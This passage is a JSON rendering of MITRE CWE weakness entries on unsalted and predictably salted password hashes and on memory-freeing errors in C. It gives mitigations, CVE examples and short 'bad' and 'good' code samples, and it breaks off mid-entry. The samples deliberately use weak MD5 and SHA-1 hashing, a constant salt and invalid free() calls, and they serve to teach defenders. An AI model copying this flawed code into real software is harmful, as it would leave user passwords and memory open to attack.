coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."},{"Intro_Text":"In this example, a new user provides a new username and password to create an account. The program hashes the new user\'s password then stores it in a database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\',b\'SaltGoesHere\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}}],"Body_Text":["While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised.","Fixing this is as simple as providing a salt to the hashing function on initialization:","Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Creating a Salted Hash&#34; Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Salt Values&#34;, Page 46"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"760":{"attr":{"@_ID":"760","@_Name":"Use of a One-Way Hash with a Predictable Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software uses a predictable salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Creating a Salted Hash&#34; Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Salt Values&#34;, Page 46"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"761":{"attr":{"@_ID":"761","@_Name":"Free of Pointer not at Start of Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer.","Extended_Description":{"xhtml:p":["This can cause the application to crash, or in some cases, modify critical program variables or execute code.","This weakness often occurs when the memory is allocated explicitly on the heap with one of the malloc() family functions and free() is called, but pointer arithmetic has caused the pointer to be in the interior or end of the buffer."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When utilizing pointer arithmetic to traverse a buffer, use a separate variable to track progress through memory and preserve the originally allocated address for later freeing."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i &lt; strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&amp;inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap &gt;= &amp;argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-11930","Description":"function \\"internally calls \'calloc\' and returns a pointer at an index... inside the allocated buffer. This led to freeing invalid memory.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11930"}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"Currently, CWE-763 is the parent, however it may be desirable to have an intermediate parent which is not function-specific, similar to how CWE-762 is an intermediate parent between CWE-763 and CWE-590.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"762":{"attr":{"@_ID":"762","@_Name":"Mismatched Memory Management Routines","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource.","Extended_Description":{"xhtml:p":["This weakness can be generally described as mismatching memory management routines, such as:","When the memory management functions are mismatched, the consequences may be as severe as code execution, memory corruption, or program crash. Consequences and ease of exploit will vary depending on the implementation of the routines and the object being managed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated on the stack (automatically), but it was deallocated using the memory management routine free() (CWE-590), which is intended for explicitly allocated heap memory.","The memory was allocated explicitly using one set of memory management functions, and deallocated using a different set. For example, memory might be allocated with malloc() in C++ instead of the new operator, and then deallocated with the delete operator."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to 